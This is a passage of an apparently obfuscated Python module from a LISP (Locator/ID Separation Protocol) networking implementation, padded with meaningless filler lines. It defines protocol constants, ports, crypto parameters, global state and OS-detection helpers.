if 58 - 58: OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - I1ii11iIi11i / oO0o
if 50 - 50: I1IiiI
lisp_nat_traversal = False
if 34 - 34: I1IiiI * II111iiii % iII111i * OoOoOO00 - I1IiiI
if 33 - 33: o0oOOo0O0Ooo + OOooOOo * OoO0O00 - Oo0Ooo / oO0o % Ii1I
if 21 - 21: OoO0O00 * iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
if 88 - 88: Ii1I / I1Ii111 + iII111i - II111iiii / ooOoO0o - OoOoOO00
if 15 - 15: I1ii11iIi11i + OoOoOO00 - OoooooooOO / OOooOOo
if 58 - 58: i11iIiiIii % I11i
lisp_program_hardware = False
if 71 - 71: OOooOOo + ooOoO0o % i11iIiiIii + I1ii11iIi11i - IiII
if 88 - 88: OoOoOO00 - OoO0O00 % OOooOOo
if 16 - 16: I1IiiI * oO0o % IiII
if 86 - 86: I1IiiI + Ii1I % i11iIiiIii * oO0o . ooOoO0o * I11i
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
if 44 - 44: oO0o
if 88 - 88: I1Ii111 % Ii1I . II111iiii
if 38 - 38: o0oOOo0O0Ooo
if 57 - 57: O0 / oO0o * I1Ii111 / OoOoOO00 . II111iiii
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
if 26 - 26: iII111i
if 91 - 91: OoO0O00 . I1ii11iIi11i + OoO0O00 - iII111i / OoooooooOO
if 39 - 39: I1ii11iIi11i / ooOoO0o - II111iiii
if 98 - 98: I1ii11iIi11i / I11i % oO0o . OoOoOO00
if 91 - 91: oO0o % Oo0Ooo
lisp_ipc_lock = None
if 64 - 64: I11i % iII111i - I1Ii111 - oO0o
if 31 - 31: I11i - II111iiii . I11i
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
lisp_default_iid = 0
lisp_default_secondary_iid = 0
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
if 68 - 68: OoO0O00 * OoooooooOO % O0 + OoO0O00 + ooOoO0o
lisp_ms_rtr_list = [ ]
if 4 - 4: ooOoO0o + O0 * OOooOOo
if 55 - 55: Oo0Ooo + iIii1I11I1II1 / OoOoOO00 * oO0o - i11iIiiIii - Ii1I
if 25 - 25: I1ii11iIi11i
if 7 - 7: i1IIi / I1IiiI * I1Ii111 . IiII . iIii1I11I1II1
if 13 - 13: OOooOOo / i11iIiiIii
if 2 - 2: I1IiiI / O0 / o0oOOo0O0Ooo % OoOoOO00 % Ii1I
lisp_nat_state_info = { }
if 52 - 52: o0oOOo0O0Ooo
if 95 - 95: Ii1I
if 87 - 87: ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
if 91 - 91: O0
if 61 - 61: II111iiii
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time . time ( )
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
lisp_last_icmp_too_big_sent = 0
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = [ ]
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
if 68 - 68: OoOoOO00 - OoO0O00
lisp_policies = { }
if 28 - 28: OoO0O00 . OOooOOo / OOooOOo + Oo0Ooo . I1ii11iIi11i
if 1 - 1: iIii1I11I1II1 / II111iiii
if 33 - 33: I11i
if 18 - 18: o0oOOo0O0Ooo % iII111i * O0
if 87 - 87: i11iIiiIii
lisp_load_split_pings = False
if 93 - 93: I1ii11iIi11i - OoO0O00 % i11iIiiIii . iII111i / iII111i - I1Ii111
if 9 - 9: I1ii11iIi11i / Oo0Ooo - I1IiiI / OoooooooOO / iIii1I11I1II1 - o0oOOo0O0Ooo
if 91 - 91: iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if 51 - 51: O0 + iII111i
lisp_eid_hashes = [ ]
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
lisp_reassembly_queue = { }
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
if 77 - 77: iIii1I11I1II1 * OoO0O00
lisp_pubsub_cache = { }
if 95 - 95: I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
if 53 - 53: II111iiii
if 31 - 31: OoO0O00
lisp_decent_push_configured = False
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: OoO0O00
if 62 - 62: OOooOOo + O0
if 98 - 98: o0oOOo0O0Ooo
if 51 - 51: Oo0Ooo - oO0o + II111iiii * Ii1I . I11i + oO0o
if 78 - 78: i11iIiiIii / iII111i - Ii1I / OOooOOo + oO0o
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
if 82 - 82: Ii1I
if 46 - 46: OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
if 55 - 55: OOooOOo . I1IiiI
lisp_ipc_socket = None
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
if 100 - 100: I1Ii111 * O0
if 64 - 64: OOooOOo % iIii1I11I1II1 * oO0o
if 79 - 79: O0
lisp_ms_encryption_keys = { }
lisp_ms_json_keys = { }
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
if 29 - 29: iIii1I11I1II1 + OoOoOO00 * OoO0O00 * OOooOOo . I1IiiI * I1IiiI
if 7 - 7: IiII * I1Ii111 % Ii1I - o0oOOo0O0Ooo
if 13 - 13: Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
lisp_rtr_nat_trace_cache = { }
if 49 - 49: I1IiiI - I11i
if 74 - 74: iIii1I11I1II1 * I1ii11iIi11i + OoOoOO00 / i1IIi / II111iiii . Oo0Ooo
if 62 - 62: OoooooooOO * I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
lisp_glean_mappings = [ ]
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
if 54 - 54: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo / oO0o - OoO0O00 . I11i
if 11 - 11: I1ii11iIi11i . OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
if 26 - 26: Ii1I % I1ii11iIi11i
lisp_gleaned_groups = { }
if 76 - 76: IiII * iII111i
if 52 - 52: OOooOOo
if 19 - 19: I1IiiI
if 25 - 25: Ii1I / ooOoO0o
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
lisp_icmp_raw_socket = None
if ( os . getenv ( "LISP_SEND_ICMP_TOO_BIG" ) != None ) :
lisp_icmp_raw_socket = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_ICMP )
lisp_icmp_raw_socket . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
if 71 - 71: I1Ii111 . II111iiii
if 62 - 62: OoooooooOO . I11i
lisp_ignore_df_bit = ( os . getenv ( "LISP_IGNORE_DF_BIT" ) != None )
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
if 31 - 31: OOooOOo
lisp_map_reply_action_string = [ "no-action" , "native-forward" ,
"send-map-request" , "drop-action" , "policy-denied" , "auth-failure" ]
if 23 - 23: I1Ii111 . IiII
if 92 - 92: OoOoOO00 + I1Ii111 * Ii1I % I1IiiI
if 42 - 42: Oo0Ooo
if 76 - 76: I1IiiI * iII111i % I1Ii111
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
if 78 - 78: Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
LISP_MR_TTL = ( 24 * 60 )
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60
LISP_TEST_MR_INTERVAL = 60
LISP_MAP_NOTIFY_INTERVAL = 2
LISP_DDT_MAP_REQUEST_INTERVAL = 2
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15
LISP_MAP_REQUEST_RATE_LIMIT = .5
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
LISP_RLOC_PROBE_TTL = 128
LISP_RLOC_PROBE_INTERVAL = 10
LISP_RLOC_PROBE_REPLY_WAIT = 15
LISP_DEFAULT_DYN_EID_TIMEOUT = 15
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
if 79 - 79: O0 * i11iIiiIii - IiII / IiII
if 48 - 48: O0
if 93 - 93: i11iIiiIii - I1IiiI * I1ii11iIi11i * I11i % O0 + OoooooooOO
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
if 9 - 9: ooOoO0o * OoooooooOO - iIii1I11I1II1 + OoOoOO00 / OoO0O00 . OoO0O00
if 49 - 49: II111iiii
if 25 - 25: OoooooooOO - I1IiiI . I1IiiI * oO0o
if 81 - 81: iII111i + IiII
if 98 - 98: I1IiiI
if 95 - 95: ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 55 - 55: ooOoO0o - I11i + II111iiii + iII111i % Ii1I
if 41 - 41: i1IIi - I11i - Ii1I
if 8 - 8: OoO0O00 + I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo % o0oOOo0O0Ooo * oO0o
if 9 - 9: Oo0Ooo - i11iIiiIii - OOooOOo * Ii1I + ooOoO0o
if 44 - 44: II111iiii
if 52 - 52: I1ii11iIi11i - Oo0Ooo + I1ii11iIi11i % o0oOOo0O0Ooo
if 35 - 35: iIii1I11I1II1
if 42 - 42: I1Ii111 . I1IiiI . i1IIi + OoOoOO00 + OOooOOo + I1IiiI
if 31 - 31: iII111i . OOooOOo - ooOoO0o . OoooooooOO / OoooooooOO
if 56 - 56: OoO0O00 / oO0o / i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
if 53 - 53: oO0o - I1IiiI - oO0o * iII111i
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
if 46 - 46: o0oOOo0O0Ooo % iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
if 28 - 28: ooOoO0o + i11iIiiIii / I11i % OoOoOO00 % Oo0Ooo - O0
if 54 - 54: i1IIi + II111iiii
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
if 5 - 5: Ii1I
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
if 46 - 46: IiII
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
if 45 - 45: ooOoO0o
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
if 21 - 21: oO0o . I1Ii111 . OOooOOo / Oo0Ooo / I1Ii111
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
if 17 - 17: OOooOOo / OOooOOo / I11i
if 1 - 1: i1IIi . i11iIiiIii % OOooOOo
if 82 - 82: iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % IiII / Ii1I . Ii1I
if 14 - 14: o0oOOo0O0Ooo . OOooOOo . I11i + OoooooooOO - OOooOOo + IiII
if 9 - 9: Ii1I
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
def lisp_record_traceback ( * args ) :
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
i1 = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
OO0oOOoo = open ( "./logs/lisp-traceback.log" , "a" )
OO0oOOoo . write ( "---------- Exception occurred: {} ----------\n" . format ( i1 ) )
try :
traceback . print_last ( file = OO0oOOoo )
except :
OO0oOOoo . write ( "traceback.print_last(file=fd) failed" )
if 52 - 52: o0oOOo0O0Ooo % Oo0Ooo
try :
traceback . print_last ( )
except :
print ( "traceback.print_last() failed" )
if 64 - 64: O0 % I11i % O0 * OoO0O00 . oO0o + I1IiiI
OO0oOOoo . close ( )
return
if 75 - 75: I11i . OoooooooOO % o0oOOo0O0Ooo * I11i % OoooooooOO
if 13 - 13: IiII / i11iIiiIii % II111iiii % I11i . I1ii11iIi11i
if 8 - 8: OoOoOO00 + Oo0Ooo - II111iiii
if 11 - 11: i1IIi % i11iIiiIii - i1IIi * OoOoOO00
if 39 - 39: I1Ii111
if 86 - 86: I11i * I1IiiI + I11i + II111iiii
if 8 - 8: I1Ii111 - iII111i / ooOoO0o
def lisp_set_exception ( ) :
sys . excepthook = lisp_record_traceback
return
if 96 - 96: OoOoOO00
if 29 - 29: I1ii11iIi11i / i1IIi . I1IiiI - OoOoOO00 - OoOoOO00 - Ii1I
if 20 - 20: i1IIi % OoO0O00 . I1IiiI / IiII * i11iIiiIii * OOooOOo
if 85 - 85: o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . O0 % I1Ii111
if 90 - 90: Oo0Ooo % O0 * iIii1I11I1II1 . iII111i
if 8 - 8: ooOoO0o + II111iiii / iII111i / I11i
if 74 - 74: O0 / i1IIi
def lisp_is_raspbian ( ) :
if ( platform . dist ( ) [ 0 ] != "debian" ) : return ( False )
return ( platform . machine ( ) in [ "armv6l" , "armv7l" ] )
if 78 - 78: OoooooooOO . OoO0O00 + ooOoO0o - i1IIi
if 31 - 31: OoooooooOO . OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if 45 - 45: I1Ii111
def lisp_is_ubuntu ( ) :
return ( platform . dist ( ) [ 0 ] == "Ubuntu" )
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
def lisp_is_fedora ( ) :
return ( platform . dist ( ) [ 0 ] == "fedora" )
if 92 - 92: ooOoO0o
if 22 - 22: Oo0Ooo % iII111i * I1ii11iIi11i / OOooOOo % i11iIiiIii * I11i
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
if 92 - 92: I11i . I1Ii111
if 85 - 85: I1ii11iIi11i . I1Ii111
if 78 - 78: ooOoO0o * I1Ii111 + iIii1I11I1II1 + iIii1I11I1II1 / I1Ii111 . Ii1I
def lisp_is_centos ( ) :
return ( platform . dist ( ) [ 0 ] == "centos" )
if 97 - 97: ooOoO0o / I1Ii111 % i1IIi % I1ii11iIi11i
if 18 - 18: iIii1I11I1II1 % I11i
if 95 - 95: ooOoO0o + i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - iIii1I11I1II1
if 75 - 75: OoooooooOO * IiII
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
def lisp_is_debian ( ) :
return ( platform . dist ( ) [ 0 ] == "debian" )
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
if 73 - 73: i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
def lisp_is_debian_kali ( ) :
return ( platform . dist ( ) [ 0 ] == "Kali" )
if 10 - 10: IiII / OoO0O00 + OoOoOO00 / i1IIi
if 27 - 27: Ii1I
if 67 - 67: I1IiiI
if 55 - 55: I1ii11iIi11i - iII111i * o0oOOo0O0Ooo + OoOoOO00 * OoOoOO00 * O0
if 91 - 91: I1Ii111 - OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o
if 98 - 98: OoO0O00 . OoO0O00 * oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
def lisp_is_macos ( ) :
return ( platform . uname ( ) [ 0 ] == "Darwin" )
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
if 90 - 90: iII111i
if 31 - 31: OOooOOo + O0
def lisp_is_alpine ( ) :
return ( os . path . exists ( "/etc/alpine-release" ) )
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
def lisp_is_x86 ( ) :
i1i1IIii1i1 = platform . machine ( )
return ( i1i1IIii1i1 in ( "x86" , "i686" , "x86_64" ) )
if 65 - 65: I1IiiI + OoOoOO00 / OOooOOo
if 83 - 83: o0oOOo0O0Ooo . iII111i - Oo0Ooo
if 65 - 65: iIii1I11I1II1 / ooOoO0o . IiII - II111iiii
if 72 - 72: iIii1I11I1II1 / IiII % iII111i % OOooOOo - I11i % OOooOOo
if 100 - 100: Oo0Ooo + i11iIiiIii
if 71 - 71: I11i / o0oOOo0O0Ooo / I1Ii111 % OOooOOo
